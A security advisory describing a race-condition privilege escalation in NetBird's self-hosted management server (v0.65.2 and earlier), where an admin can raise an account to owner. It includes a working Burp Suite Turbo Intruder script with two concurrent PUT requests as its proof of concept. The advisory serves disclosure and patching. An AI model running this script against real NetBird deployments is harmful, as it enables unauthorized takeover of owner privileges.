PT-2026-32138 · Go · Github.Com/Netbirdio/Netbird

Published

2026-04-01

·

Updated

2026-04-01

CVSS v3.1

4.4

Medium

VectorAV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N

Summary

A race condition vulnerability allows authenticated admin-privileged users to escalate to owner privilege.

Details

The vulnerability exists in the updateUser function, which is connected to the /users/{userId} PUT request. This function then calls the SaveOrAddUsers function, which checks the user's permissions on two separate occasions. The first check verifies whether the initiator is an admin or owner and rejects the request if the initiator is not. The second check retrieves the user role details from the database again and saves them in a variable called initiatorUser.

SaveOrAddUsers Function

Location: netbird/management/server/user.go — Line 556
SaveOrAddUsers function code showing the two separate permission checks
Afterwards, the validateUserUpdate function is called, which checks if the initiator has permission to update that specific user's role. This validation is lacking, as it assumes the initiator is an admin or owner. In the case that the initiator is a regular user, these conditions do not apply, and the target can be updated to owner even when the initiator holds only a user role.

validateUserUpdate Function

Location: netbird/management/server/user.go — Line 862
validateUserUpdate function code showing the insufficient permission validation logic
In summary, if the initiator's permission is admin at the first check and gets dropped to user at the second check, the initiator can update a user to owner.

Proof of Concept

It is possible to create the following attack:
The initiator (old admin) creates two different accounts — one with a user role and another with an admin role. These will be referred to as new user and new admin from here on.
Two different requests are needed:
  1. Request 1 — Using new admin's JWT, a request is created that changes old admin's role to user.
  2. Request 2 — Using old admin's JWT, a request is created that changes new user's role to owner.
Both requests need valid user IDs and auto groups group IDs. They should be sent simultaneously without waiting for prior requests to return.
There is a very small time gap between the first and second permission checks, so multiple tries and multiple copies of the requests may be needed. During a penetration test engagement, privilege escalation was achieved by using 5 copies of Request 1 and 100 copies of Request 2 without waiting for any request to complete. The request that updated the role to owner returned 500 status codes instead of 403, which when retried returned 200 and successfully applied the update.
The following Burp Suite race condition script was used. Note that it may still require multiple tries, and the old admin account role must be reset to admin after every failed attempt.
python
import time

def queueRequests(target, wordlists):

  engine = RequestEngine(
    endpoint=target.endpoint,
    concurrentConnections=100,
    requestsPerConnection=100,
    pipeline=False
  )

  # Request 1
  req1 = """PUT /api/users/{OLD ADMIN USERID} HTTP/2
Host: CHANGE WITH HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {NEW ADMIN TOKEN}
Content-Length: 73
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"role":"user","auto groups":[GROUP ID],"is blocked":false}"""

  # Request 2
  req2 = """PUT /api/users/{NEW USER USERID} HTTP/2
Host: CHANGE WITH HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {OLD ADMIN TOKEN}
Content-Length: 52
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"role":"owner","auto groups":[],"is blocked":false}"""

  # Send first request
  engine.queue(req1)
  engine.queue(req1)
  engine.queue(req1)
  engine.queue(req1)
  engine.queue(req1)

  # Send second request
  for i in range(100):
    engine.queue(req2)


def handleResponse(req, interesting):
  table.add(req)

Impact

An attacker with an admin account on the self-hosted NetBird management application v0.65.2 or lower can escalate to owner privileges.

Fix

Race Condition

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-362

Related Identifiers

GHSA-RXMP-8H9V-56CX

Affected Products

Github.Com/Netbirdio/Netbird